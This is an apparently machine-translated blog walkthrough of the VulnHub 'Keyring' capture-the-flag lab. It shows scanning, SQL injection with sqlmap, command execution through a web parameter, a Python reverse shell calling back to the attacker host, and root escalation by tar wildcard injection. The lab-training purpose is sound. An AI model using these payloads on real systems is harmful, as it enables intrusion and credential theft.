当前位置:网站首页>Penetration practice vulnhub range Keyring

Penetration practice vulnhub range Keyring

2022-07-01 17:39:00 It's safe to go to school on Fubo road

No.26 Keyring

Target information

Download address :

https://www.vulnhub.com/entry/ia-keyring-101,718/

shooting range : VulnHub.com

Target name : IA: Keyring (1.0.1)

difficulty : Simple - secondary

Release time : 2021 year 7 month 30 Japan

The goal is : 2 individual flag

Experimental environment 

 attack :VMware	kali	192.168.7.3

 Drone aircraft :Vbox		linux	IP Automatic access to

information gathering

Scan host

Scan the target in the LAN IP Address 

sudo nmap -sP 192.168.7.1/24

image-20220208234543993

The scanned host address is 192.168.7.157

Scan port

Scan the open service port of the target 

sudo nmap -sC -sV -p- 192.168.7.158 -oN keyring.nmap

image-20220208234655711

Scan to 2 Open ports 22(SSH) and 80(HTTP)

Web penetration

visit 80 port 

http://192.168.7.158

image-20220208234854811

Open the homepage to register your account , Register an account to log in ( When registering and logging in, don't fill in the user name and password , Direct point Login The button will jump to the login page and enter the account password to login )

image-20220208235630605

image-20220209000240074

Login successful , stay control.php See the prompt on the page ,HPP Parameter pollution

HTTP Parameter Pollution(HPP Parameter pollution )

Brief introduction :

​ HTTP Parameter Pollution namely HTTP Parameter pollution , abbreviation HPP. yes web Container handling HTTP A way of parameters .
HTTP Parameter pollution (HPP) It's a kind of Web Attack avoidance technology , Allows an attacker to change HTTP Request to manipulate or search for hidden information . This circumvention technique is based on splitting attack vectors between multiple instances of parameters with the same name . Some environments handle such requests by taking values from all instances of the parameter name connected in the request .

HTTP Parameter Pollution namely HTTP Parameter pollution , abbreviation HPP. yes web Container handling HTTP A way of parameters .
HTTP  Parameter pollution  (HPP)  It's a kind of  Web  Attack avoidance technology , Allows an attacker to change  HTTP  Request to manipulate or search for hidden information . This circumvention technique is based on splitting attack vectors between multiple instances of parameters with the same name . Some environments handle such requests by taking values from all instances of the parameter name connected in the request .

Example :

HttpPar.php The source code is as follows :

<?php
 $str=$_REQUEST['str'];
 echo $str;
?>

This code , receive HTTP Parameters in str Value , And show it on the page . We visit http://www.xxx.com/HttpPar.php?str=hello, The display result will be hello.
stay HTTP In request , Use & Different parameters can be connected , Such as :str=hello&id=1. But at this time, if the parameter is repeated :str=hello&str=world&str=xxser, So at this time php Only the last parameter is output when taking value , The output is xxser. This is it. HTTP Parameter pollution .

HPP Parameter pollution can SQL Injection and XSS utilize , More are used around waf

HPP Parameter pollution is simply understood , That is, we don't know what the parameter is , First do a directory scan to find other tips

Directory scanning 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.158 -x php,html,txt

image-20220209003332574

Scan to a history.php file , Visit 

http://192.168.7.158/history.php

image-20220209003727801

After opening, there is a blank page , It is estimated that you need to add parameters here to access , When the logged out user visits this page again, a prompt appears

image-20220209005937071

Prompt user not found , For re login user Try making parameters 

http://192.168.7.158/history.php?user=user1234

image-20220209014307811

When I use my registered user name to test some content , Change to admin try 

http://192.168.7.158/history.php?user=admin

image-20220209015139788

Get a link https://github.com/cyberbot75/keyring

Access is the repository for storing website source code , stay control.php Found in the file system Functions can be used directly , Test it

image-20220209015750951

http://192.168.7.158/control.php?cmdcntr=id

image-20220209021631583

SQL Injection attack

No success , Looking at the source code, I didn't find any problems , See again HPP Prompt of parameter pollution , And I got it user Parameters , Go and make a sql Injection try

Query database name 

sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch --dbs

image-20220210001832352

The query table name 

sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users --tables

image-20220210002015174

Query table content 

sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users -T details --dump

image-20220210002148796

Query the administrator account admin And password myadmin#p4szw0r4d, Use admin Log in to the platform with your account and use control.php I got the papers cmdcntr jurisdiction 

http://192.168.7.158/control.php?cmdcntr=id

image-20220210002639710

Command executed successfully , We rebound shell To kali On the attack plane

kali Attacker listening port 

nc -lvvp 4444

perform payload

http://192.168.7.158/control.php?cmdcntr=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20220210003322731

Successful rebound shell, Let's look for the document , Switch to bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20220210070502380

Raise the right 

cat /etc/passwd

image-20220210064134687

Here is a john user , Before sql There is also one in the injection john The user tries whether the password is the same , Switch to john The user password is Sup3r S 3 c r 3 t S3cr3t S3cr3tPasSW0RD

su john
Sup3r$S3cr3t$PasSW0RD
id

image-20220210064650659

Switch john User success , there lxd Right can be raised , First enter the user directory and have a look 

cd /home/john
ls -al

image-20220210064850345

find user.txt

cat user.txt

image-20220210064930478

One more compress Program , Let's see what the file is 

file compress

image-20220210065333222

suid, Download him and see the content , Target on http service 

python3 -m http.server

image-20220210065548354

kali Attacker download compress file , View file contents 

wget http://192.168.7.158:8000/compress
strings compress

image-20220210070730236

compress Will execute tar Program ,tar Wildcard injection can be used to raise rights ,

payload

echo "/bin/bash" > exp.sh
echo "" > "--checkpoint-action=exec=sh exp.sh"
echo "" > --checkpoint=1
./compress
id

image-20220210073935471

Successfully get root jurisdiction , see root.txt

cd /root
ls
cat root.txt

image-20220210074112553

Get root.txt, Game over . Friends who like shooting can search on wechat “ It's safe to go to school on vobo road ” official account 、 Or scan the QR code below to get more targeting articles .
Insert picture description here

原网站

版权声明
本文为[It's safe to go to school on Fubo road]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202152327514125.html

边栏推荐

猜你喜欢

随机推荐